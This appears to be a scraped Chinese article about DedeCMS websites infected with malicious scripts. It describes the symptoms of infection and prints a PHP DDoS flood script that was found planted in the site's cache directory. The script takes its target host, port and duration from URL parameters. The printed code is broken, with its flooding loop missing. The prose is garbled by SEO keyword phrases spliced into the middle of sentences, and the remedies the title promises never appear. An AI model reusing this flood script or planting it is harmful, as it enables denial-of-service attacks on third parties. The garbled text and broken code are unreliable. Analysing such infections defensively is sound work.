dedecms針對DDOS掛馬漏洞的解決方法,DEDE技術
導讀:DEDE技術DEDE技術這篇文章主要為大家介紹了dedecms針對DDOS掛馬漏洞的解決方法,需要的朋友可以參考下 Dedecms是國內著名的php開源系統,也是很多站長建站的首選CMdede后臺模板。
DDoSdede
這篇文章主要為大家介紹了dedecms針對DDOS掛馬漏洞的解決方法,需要的朋友可以參考下
Dedecms是國內著名的php開源系統,也是很多站長建站的首選CMS系統,簡單易用是其廣泛實用的一大原因,而正織夢cms模板是因為dedecms的開源,也導致了很多黑客盯上了這個程序,于是接連研究出了很多dedecms的漏洞,造成了目前有相當多的dedecms網站都被掛馬了,有的被機房警告,嚴重的機房被強dede5.7模板行關站,損失巨大。今天就這一問題做較為深入的剖析,找出解決之道。 被掛馬的特征:打開自己的網站首頁,用查看源代碼的方式會發現自己的網站被增加了許許多多的黑鏈代碼,黑鏈代碼是最簡單也最能讓站長們看出來的,他無非就是友情鏈接的代碼。 再一個特征就是打開網站會被360安全提示網站存在掛馬風險,這一類型的掛馬代碼,一般是框架代碼或者是js代碼或者是圖片代碼,還有個特征就是網站 會突然打不開或者打開慢,檢查流量會發現自己占用了許多流量,也就是說流量往外發包的特征,也叫UDP 流量發包攻擊。以上就是dedecms被掛馬的大體特征,下面就講點實際的,網站被掛馬的解決辦法和預防措施。 首先把網站程序的代碼下載到自己的本地,用sinesafe木馬清除工具檢測了一下,發現data/cache/目錄下有許多腳本木馬,打開木馬腳本發現了一些不認識的PHP代碼,把代碼放到sinesafe木馬工具里深度剖析了一下發現了木馬特征,代碼如下:
代碼如下: <?phpset_time_limit(984918);$host = $_GET['host'];$port = $_GET['port'];$exec_time = $_GET['time'];$Sendlen = 65535;$packets = 0;}echo "================================================";echo " <font color=blue>www.phpddos.com";echo " SYN Flood 模塊";echo " 作者:ybhacker";echo " 警告:本程序帶有攻擊性,僅供安全研究與教學之用,風險自負!</font>";echo "================================================";echo "dede模板堂; 攻擊包總數:<font color=Red><span class=\"text\">".$packets." 個數據包</span></font>";echo " 攻擊總流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span></font>";echo " 攻擊總字節:<font color=Red><span class=\"text\">".time('h:i:s')." 字節</span></font>";echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";?>聲明: 本文由我的SEOUC技術文章主頁發布于:2023-07-19 ,文章dedecms針對DDOS掛馬漏洞的解決方法,DEDE技術主要講述解決方法,漏洞,DEDE技術網站建設源碼以及服務器配置搭建相關技術文章。轉載請保留鏈接: http://www.bifwcx.com/article/web_30843.html